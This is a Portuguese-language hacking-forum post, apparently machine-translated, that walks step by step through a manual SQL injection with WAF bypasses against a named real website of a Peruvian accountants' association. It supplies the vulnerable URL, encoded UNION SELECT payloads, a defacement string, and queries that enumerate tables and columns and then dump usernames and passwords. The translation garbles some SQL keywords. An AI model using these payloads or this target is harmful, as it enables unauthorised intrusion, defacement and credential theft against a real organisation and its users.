COVIL HACKER

, ! .


» COVIL HACKER » Vulnerabilidades de aplicativos da Web » Manuel SQL Injection, Waff bypass denamesi #1


Manuel SQL Injection, Waff bypass denamesi #1

1 2 2

1

Abordarei os sites onde podemos ganhar experiência em Manual Sql Injection, e os que lidam com waffs indo do simples ao difícil... Cada site significa uma nova informação e uma nova experiência.

Nosso site com exemplo de injeção de SQL;
http://jdccpp.org.pe/detalle-seminario.php?id=93'

Quando obtemos uma saída de erro baseada em erro, podemos descobrir o número da nossa coluna usando agrupar por atalho. :)
Sim, diz que dá um erro de 14, então nosso número de coluna é 13. .
http://jdccpp.org.pe/detalle-seminario. … 99,100--+-

https://forumupload.ru/uploads/001b/c9/09/2/t907393.png

Agora, como todos sabem, é hora de imprimir nossas colunas vulneráveis, :)não importa qual bypass você use, por exemplo;
1- /*!12345STRING */
2- /*!50000STRING */
3- /*!13337 STRING*/
4- STRING/**_**/
5- /*!50000STRING /**_**/ */
Ou o site waffled o espaço ou o +, então url encode = %0A

amigos, não consegui passar o waff assim, codifiquei o "U" em Union, "S" em Select da url e consegui imprimir os números.
http://jdccpp.org.pe/detalle-seminario.php?id=-93 ' AND MOD(29.2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9, 10, 11,12,13--+-

https://forumupload.ru/uploads/001b/c9/09/2/t284161.png

Também capturamos banco de dados, versão e informações do usuário.
Ao usar group_concat, ainda precisamos codificar as iniciais url, porque elas têm o mesmo waff.

Junta de Decanos de Colegios de Contadores Públicos del Perú ' AND MOD(29.2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size=" 5px" >','Hackeado por PresanS','<br>','<img src= https://i.hizliresim.com/DPrBm6.gif >','<br>','database_name=%0A' ,database (),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9, 10, 11,12,13--+-

também tem puxando as mesas, aplico as operações que a gente conhece.

' AND MOD(29.2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+ de+ information_schema.tables+where+table_schema=database()--+-

sim, existem 2 tabelas aqui que devem chamar nossa atenção; tabelas intranetusuários,usuários.
Vou desenhar as colunas da tabela dos usuarios.

Junta de Decanos de Colegios de Contadores Públicos del Perú ' AND MOD(29.2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>' ), 10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-

https://forumupload.ru/uploads/001b/c9/09/2/t964052.png

Sim, puxamos nossas colunas, era hora de despejar, fiz o caminho normal, mas encontrei um problema.

Junta de Decanos de Colegios de Contadores Públicos del Perú ' AND MOD(29.2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br >' ),10,11,12,13+de+usuários--+-https://forumupload.ru/uploads/001b/c9/09/2/t108807.png

Você pode usar os métodos de despejo que conhece aqui, tentei 3 deles, obtive resultados positivos no último.

Junta de Decanos de Colegios de Contadores Públicos del Perú ' AND MOD(29.2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_* */ */(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000 %53ELECT /**_**/*/(@x)/*!50000FROM/**_**/*/(usuários)/*!50000WHERE/**_**/*/(@x)IN( @x :=/*!50000%43ONCAT/**_*/*/(0x20,@x,'User_name=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10 ,11 ,12,13--+-

https://forumupload.ru/uploads/001b/c9/09/2/t383791.png

0

2


» COVIL HACKER » Vulnerabilidades de aplicativos da Web » Manuel SQL Injection, Waff bypass denamesi #1


|